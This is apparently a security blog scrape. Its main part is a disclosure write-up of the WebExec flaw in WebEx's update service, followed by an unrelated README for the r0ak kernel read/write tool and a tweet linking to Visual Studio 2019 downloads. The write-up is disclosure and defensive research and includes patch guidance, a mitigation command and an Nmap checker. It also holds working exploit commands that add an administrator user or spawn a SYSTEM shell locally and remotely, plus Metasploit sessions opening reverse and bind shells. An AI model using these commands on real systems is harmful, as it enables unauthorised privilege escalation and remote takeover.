As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class «thank you for your service», because we can, and are crossing our fingers that more are out there!
The actual version of WebEx is the latest client build as of August, 2018: Version 3211.0.1801.2200, modified 7/19/2018 SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We’ve tested some older and newer versions since then, and they are still vulnerable.
WebEx released patch on October 3, but requested we maintain embargo until they release their advisory. You can find all the patching instructions on webexec.org.
The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you’re concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:
c:\>sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.
Privilege Escalation
What initially got our attention is that folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called «webexservice» that can be started and stopped by anybody. That’s not good! It is trivial to replace the .exe or an associated .dll with anything we like, and get code execution at the service level (that’s SYSTEM). That’s an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.
Due to the application whitelisting, however, on this particular assessment we couldn’t simply replace this with a shell! The service starts non-interactively (ie, no window and no commandline arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.
One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it’s a service, it runs with the working directory c:\windows\system32, and we couldn’t write to that folder!
At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let’s take a look
Deep dive into WebExService.exe
It’s not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA is the strings windows (shift-F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:
.rdata:00405438 ; wchar_t aSCreateprocess .rdata:00405438 aSCreateprocess: ; DATA XREF: sub_4025A0+1E8o .rdata:00405438 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0
I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:
.text:0040254E push [ebp+lpProcessInformation] ; lpProcessInformation .text:00402554 push [ebp+lpStartupInfo] ; lpStartupInfo .text:0040255A push 0 ; lpCurrentDirectory .text:0040255C push 0 ; lpEnvironment .text:0040255E push 0 ; dwCreationFlags .text:00402560 push 0 ; bInheritHandles .text:00402562 push 0 ; lpThreadAttributes .text:00402564 push 0 ; lpProcessAttributes .text:00402566 push [ebp+lpCommandLine] ; lpCommandLine .text:0040256C push 0 ; lpApplicationName .text:0040256E push [ebp+phNewToken] ; hToken .text:00402574 call ds:CreateProcessAsUserW
The W on the end refers to the UNICODE («wide») version of the function. When developing Windows code, developers typically use CreateProcessAsUser in their code, and the compiler expands it to CreateProcessAsUserA for ASCII, and CreateProcessAsUserW for UNICODE. If you look up the function definition for CreateProcessAsUser, you’ll find everything you need to know.
In any case, the two most important arguments here are hToken — the user it creates the process as — and lpCommandLine — the command that it actually runs. Let’s take a look at each!
hToken
The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what’s going on. Trying to understand what code’s doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you’ll see shortly.
At the top of the function, we see:
.text:0040241E call ds:CreateToolhelp32Snapshot
This is a normal way to search for a specific process in Win32 — it creates a «snapshot» of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).
Based simply on knowledge of the APIs, we can deduce that it’s searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:
.text:00402480 lea eax, [ebp+Str1] .text:00402486 push offset Str2 ; "winlogon.exe" .text:0040248B push eax ; Str1 .text:0040248C call ds:_wcsicmp .text:00402492 add esp, 8 .text:00402495 test eax, eax .text:00402497 jnz short loc_4024BE
Specifically, it’s comparing the name of each process to «winlogon.exe» — so it’s trying to get a handle to the «winlogon.exe» process!
If we continue down the function, you’ll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That’s another common sequence of API calls — it’s how a process can get a handle to another process’s token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.
To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!
An interesting takeaway here is that I didn’t really really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!
lpCommandLine
This is where things get a little more complicated, since there are a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and eventlogs to figure out exactly where lpCommandLine comes from. This took a good full day, so don’t be discouraged by this quick summary — I’m skipping an awful lot of dead ends and validation to keep just to the interesting bits.
One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I’d have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea — I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:
C:\Users\ron>sc start webexservice SERVICE_NAME: webexservice TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) [...]
You may need to configure Event Viewer to show everything in the Application logs, I didn’t really know what I was doing, but eventually I found a log entry for WebExService.exe:
ExecuteServiceCommand::Not enough command line arguments to execute a service command.
That’s handy! Let’s search for that in IDA (alt+T)! That leads us to this code:
.text:004027DC cmp edi, 3 .text:004027DF jge short loc_4027FD .text:004027E1 push offset aExecuteservice ; "ExecuteServiceCommand" .text:004027E6 push offset aSNotEnoughComm ; "%s::Not enough command line arguments t"... .text:004027EB push 2 ; wType .text:004027ED call sub_401770
A tiny bit of actual reversing: compare edit to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn’t take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let’s try it:
C:\Users\ron>sc start webexservice a b [...]
Then check Event Viewer again:
ExecuteServiceCommand::Service command not recognized: b.
Don’t you love verbose error messages? It’s like we don’t even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:
.text:00402830 loc_402830: ; CODE XREF: sub_4027D0+3Dj .text:00402830 push dword ptr [esi+8] .text:00402833 push offset aExecuteservice ; "ExecuteServiceCommand" .text:00402838 push offset aSServiceComman ; "%s::Service command not recognized: %ls"... .text:0040283D push 2 ; wType .text:0040283F call sub_401770
If we scroll up just a bit to determine how we get to that error message, we find this:
.text:004027FD loc_4027FD: ; CODE XREF: sub_4027D0+Fj .text:004027FD push offset aSoftwareUpdate ; "software-update" .text:00402802 push dword ptr [esi+8] ; lpString1 .text:00402805 call ds:lstrcmpiW .text:0040280B test eax, eax .text:0040280D jnz short loc_402830 ; <-- Jumps to the error we saw .text:0040280F mov [ebp+var_4], eax .text:00402812 lea edx, [esi+0Ch] .text:00402815 lea eax, [ebp+var_4] .text:00402818 push eax .text:00402819 push ecx .text:0040281A lea ecx, [edi-3] .text:0040281D call sub_4025A0
The string software-update is what the string is compared to. So instead of b, let’s try software-update and see if that gets us further! I want to once again point out that we’re only doing an absolutely minimum amount of reverse engineering at the assembly level — we’re basically entirely using API calls and error messages!
Here’s our new command:
C:\Users\ron>sc start webexservice a software-update [...]
Which results in the new log entry:
Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3 Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3 Exception code: 0xc0000005 Fault offset: 0x00002643 Faulting process id: 0x654 Faulting application start time: 0x01d42dbbf2bcc9b8 Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe Report Id: 31555e60-99af-11e8-8391-0800271677bd
Uh oh! I’m normally excited when I get a process to crash, but this time I’m actually trying to use its features! What do we do!?
First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you’ll know that it’s a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).
The first thing I tried was the brute-force approach: let’s add more commandline arguments! My logic was that it might require 2 arguments, but actually use the third and onwards for something then crash when they aren’t present.
So I started the service with the following commandline:
C:\Users\ron>sc start webexservice a software-update a b c d e f [...]
That led to a new crash, so progress!
Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3 Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6 Exception code: 0x40000015 Fault offset: 0x000a7676 Faulting process id: 0x774 Faulting application start time: 0x01d42dbc22eef30e Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll Report Id: 60a0439c-99af-11e8-8391-0800271677bd
I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard — probably a failed assert()? We don’t really have any output, so it’s hard to say.
This one took me awhile, and this is where I’ll skip the deadends and debugging and show you what worked.
Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you’ll see this function call:
.text:0040281D call sub_4025A0
If you jump into that function (double click), and scroll down a bit, you’ll see:
.text:00402616 mov [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"
I used the most advanced technique in my arsenal here and googled that string. It turns out that it’s a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That’s a great sign, it means we’re almost there!
A little bit after, in the same function, we see this code:
.text:004026A2 push eax ; EndPtr .text:004026A3 push esi ; Str .text:004026A4 call ds:wcstod ; <-- .text:004026AA add esp, 8 .text:004026AD fstp [esp+0B4h+var_90] .text:004026B1 cmp esi, [esp+0B4h+EndPtr+4] .text:004026B5 jnz short loc_4026C2 .text:004026B7 push offset aInvalidStodArg ; "invalid stod argument" .text:004026BC call ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)
The line with an error — wcstod() is close to where the abort() happened. I’ll spare you the debugging details — debugging a service was non-trivial — but I really should have seen that function call before I got off track.
I looked up wcstod() online, and it’s another of Microsoft’s cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don’t know exactly what it does from there, but we can assume that it’s looking for a number somewhere.
This is where my advice becomes «be lucky». The reason is, the only number that will actually work here is «1». I don’t know why, or what other numbers do, but I ended up calling the service with the commandline:
C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6
And checked the event log:
StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).
That looks awfully promising! I changed 2 to an actual process:
C:\Users\ron>sc start webexservice a software-update 1 calc c d e f
And it opened!
C:\Users\ron>tasklist | find "calc" calc.exe 1476 Console 1 10,804 K
It actually runs with a GUI, too, so that’s kind of unnecessary. I could literally see it! And it’s running as SYSTEM!
Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!
Local exploit
The simplest exploit is to start cmd.exe with wmic.exe:
C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"
That opens a GUI cmd.exe instance as SYSTEM:
Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
If we can’t or choose not to open a GUI, we can also escalate privileges:
C:\Users\ron>net localgroup administrators [...] Administrator ron C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add [...] C:\Users\ron>net localgroup administrators [...] Administrator ron testuser
And this all works as an unprivileged user!
Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:
meterpreter > getuid Server username: IEWIN7\IEUser meterpreter > background [*] Backgrounding session 2... msf exploit(multi/handler) > use exploit/windows/local/webexec msf exploit(windows/local/webexec) > set SESSION 2 SESSION => 2 msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/local/webexec) > set LHOST 172.16.222.1 msf exploit(windows/local/webexec) > set LPORT 9001 msf exploit(windows/local/webexec) > run [*] Started reverse TCP handler on 172.16.222.1:9001 [*] Checking service exists... [*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe... [*] Launching service... [*] Sending stage (179779 bytes) to 172.16.222.132 [*] Meterpreter session 2 opened (172.16.222.1:9001 -> 172.16.222.132:49574) at 2018-08-31 14:45:25 -0700 [*] Service started... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Remote exploit
We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that’s done, you can use the exact same command against the remote host:
c:\>sc \\10.0.0.0 start webexservice a software-update 1 net localgroup administrators testuser /add
The command will run (and a GUI will even pop up!) on the other machine.
Remote exploitation with Metasploit
To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.
Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:
msf5 > use auxiliary/admin/smb/webexec_command msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.1.100-110 RHOSTS => 192.168.56.100-110 msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser SMBUser => testuser msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser SMBPass => testuser msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc COMMAND => calc msf5 auxiliary(admin/smb/webexec_command) > exploit [-] 192.168.56.105:445 - No service handle retrieved [+] 192.168.56.105:445 - Command completed! [-] 192.168.56.103:445 - No service handle retrieved [+] 192.168.56.103:445 - Command completed! [+] 192.168.56.104:445 - Command completed! [+] 192.168.56.101:445 - Command completed! [*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete) [*] Auxiliary module execution completed
And here’s the full exploit module:
msf5 > use exploit/windows/smb/webexec msf5 exploit(windows/smb/webexec) > set SMBUser testuser SMBUser => testuser msf5 exploit(windows/smb/webexec) > set SMBPass testuser SMBPass => testuser msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 msf5 exploit(windows/smb/webexec) > exploit [*] 192.168.56.101:445 - Connecting to the server... [*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'... [*] 192.168.56.101:445 - Command Stager progress - 0.96% done (999/104435 bytes) [*] 192.168.56.101:445 - Command Stager progress - 1.91% done (1998/104435 bytes) ... [*] 192.168.56.101:445 - Command Stager progress - 98.52% done (102891/104435 bytes) [*] 192.168.56.101:445 - Command Stager progress - 99.47% done (103880/104435 bytes) [*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes) [*] Started bind TCP handler against 192.168.56.101:4444 [*] Sending stage (179779 bytes) to 192.168.56.101
The actual implementation is mostly straight forward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you initially get a meterpreter .exe uploaded to execute it?
I started by using a psexec-like exploit where we upload the .exe file to a writable share, then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexecinstead. You lose the magic of WebExec!
After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage the command to an .exe file to the filesystem. Using the .vbs flavor of staging, it would write a Base64-encoded file to the disk, then a .vbs stub to decode and execute it!
There are several problems, however:
- The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
- CmdStager uses %TEMP% as a temporary directory, but our exploit doesn’t expand paths
- WebExecService seems to escape quotation marks with a backslash, and I’m not sure how to turn that off
The first two issues could be simply worked around by adding options (once I’d figured out the options to use):
wexec(true) do |opts| opts[:flavor] = :vbs opts[:linemax] = datastore["MAX_LINE_LENGTH"] opts[:temp] = datastore["TMPDIR"] opts[:delay] = 0.05 execute_cmdstager(opts) end
execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:
# This is the callback for cmdstager, which breaks the full command into # chunks and sends it our way. We have to do a bit of finangling to make it # work correctly def execute_command(command, opts) # Replace the empty string, "", with a workaround - the first 0 characters of "A" command = command.gsub('""', 'mid(Chr(65), 1, 0)') # Replace quoted strings with Chr(XX) versions, in a naive way command = command.gsub(/"[^"]*"/) do |capture| capture.gsub(/"/, "").chars.map do |c| "Chr(#{c.ord})" end.join('+') end # Prepend "cmd /c" so we can use a redirect command = "cmd /c " + command execute_single_command(command, opts) end
First, it replaces the empty string with mid(Chr(65), 1, 0), which works out to characters 1 — 1 of the string «A». Or the empty string!
Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn’t use &, because that’s already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.
And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.
In a targeted attack, it’s obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!
Checking for the patch
This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!
The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!
There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it’s no good as a script!
In order to exploit this, you have to be able to get a handle to the service-controlservice (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting the service returns either
or
, we know it worked!
Here’s the important code from the Nmap checker module we developed:
-- Create a test service that we can query local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe" status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command)) -- ... local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000) -- If the service DOES_NOT_EXIST, we couldn't run code if string.match(test_result, 'DOES_NOT_EXIST') then stdnse.debug("Result: Test service does not exist: probably not vulnerable") msrpc.svcctl_closeservicehandle(smbstate, open_result['handle']) vuln.check_results = "Could not execute code via WebExService" return report:make_output(vuln) end
Not shown: we also delete the service once we’re finished.
Conclusion
So there you have it! Escalating privileges from zero to SYSTEM using WebEx’s built-in update service! Local and remote! Check out webexec.org for tools and usage instructions!
R0Ak (The Ring 0 Army Knife) — A Command Line Utility To Read/Write/Execute Ring Zero On For Windows 10 Systems
Quick Peek
r0ak v1.0.0 -- Ring 0 Army Knife
<a class="vglnk" href="http://www.github.com/ionescu007/r0ak" rel="nofollow">http://www.github.com/ionescu007/r0ak</a>
Copyright (c) 2018 Alex Ionescu [@aionescu]
<a class="vglnk" href="http://www.windows-internals.com/" rel="nofollow">http://www.windows-internals.com</a>
USAGE: r0ak.exe
[--execute <Address | module.ext!function> <Argument>]
[--write <Address | module.ext!function> <Value>]
[--read <Address | module.ext!function> <Size>]
Introduction
Motivation
The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg), SysInternals Tools, or write their own. Unfortunately, usage of these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:
- Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
- Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
- Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers as generic «read-write-everything» drivers are frowned upon.
- Windows 10 Spring Update now includes customer-facing options for enabling HyperVisor Code Integrity (HVCI) which further restricts allowable drivers and blacklists multiple 3rd party drivers that had «read-write-everything» capabilities due to poorly written interfaces and security risks.
- Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution ‘tricks’ obsoleted, so a new approach is needed.
In such an environment, it was clear that a simple tool which can be used as an emergency band-aid/hotfix and to quickly troubleshoot kernel/system-level issues which may be apparent by analyzing kernel state might be valuable for the community.
How it Works
Basic Architecture
r0ak works by redirecting the execution flow of the window manager’s trusted font validation checks when attempting to load a new font, by replacing the trusted font table’s comparator routine with an alternate function which schedules an executive work item (
) stored in the input node. Then, the trusted font table’s right child (which serves as the root node) is overwritten with a named pipe’s write buffer (
) in which a custom work item is stored. This item’s underlying worker function and its parameter are what will eventually be executed by a dedicated
at
once a font load is attempted and the comparator routine executes, receiving the name pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.
Supported Commands
When using the
option, this function and parameter are supplied by the user.
When using
, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using
, the write gadget is used to modify the system’s HSTI buffer pointer and size (N.B.: This is destructive behavior in terms of any other applications that will request the HSTI data. As this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy back into the tool’s user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed, Windows functionality is used, and all called functions are part of the KCFG bitmap, there is no violation of any security checks, and no debugging flags are required, or usage of 3rd party poorly-written drivers.
FAQ
Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool is only possible due to the elevated/privileged security context of the Administrator account on Windows, and is understood to be a by-design behavior.
Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
As such, in November 2014, a security case was filed with the Microsoft Security Research Centre (MSRC) which responded: «[…] doesn’t fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won’t be pursuing this to fix.»
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection : AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, which agreed this was currently out of scope of Windows’s architectural security boundaries. This is because there are literally dozens — if not more — of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.
Can’t this be packaged up as part of end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:
- Require the target machine to be running Windows 10 Anniversary Update x64 or later
- Have already elevated privileges to SYSTEM
- Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
- Require the Windows SDK/WDK installed on the target machine
- Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk
Attackers interested in using this particular approach — versus very many others more cross-compatible, no-SYSTEM-right-requiring techniques — likely already adapted their own code based on the Proof-of-Concept from April 2015 — more than 3 years ago.
Usage
Requirements
Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will lookup your installation path automatically, and leverage the
and
that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source-code to use them.
Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should setup the
variable pointing to an appropriate symbol server and cached location.
It is assumed that an IT Expert or other troubleshooter which apparently has a need to read/write/execute kernel memory (and has knowledge of the appropriate kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.
Use Cases
- Some driver leaked kernel pool? Why not call
ntoskrnl.exe!ExFreePool
and pass in the kernel address that’s leaking? What about an object reference? Go call
ntoskrnl.exe!ObfDereferenceObjectand have that cleaned up.
- Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at
ntoskrnl.exe!KdPrintCircularBuffer
- Wondering how big the kernel stacks are on your machine? Try looking at
ntoskrnl.exe!KeKernelStackSize
- Want to dump the system call table to look for hooks? Go print out
ntoskrnl.exe!KiServiceTable
These are only a few examples — all Ring 0 addresses are accepted, either by
syntax or directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.
Limitations
The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:
- Reads — Limited to 4 GB of data at a time
- Writes — Limited to 32-bits of data at a time
- Executes — Limited to functions which only take 1 scalar parameter
Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the
and
commands) occurs in the context of a System Worker Thread at
. Therefore, user-mode addresses should not be passed in as parameters/arguments.
Visual Studio 2019
alright since its the weekend, hope nobody is watching, you can get an early version of Visual Studio 2019 here https://t.co/aCKX6HhyWP
channel — https://t.co/kUX13gca5H
catalog — https://t.co/OG4yKQHy9H
setup — https://t.co/aq0PFucEal
installer — https://t.co/K7IsnKx3jD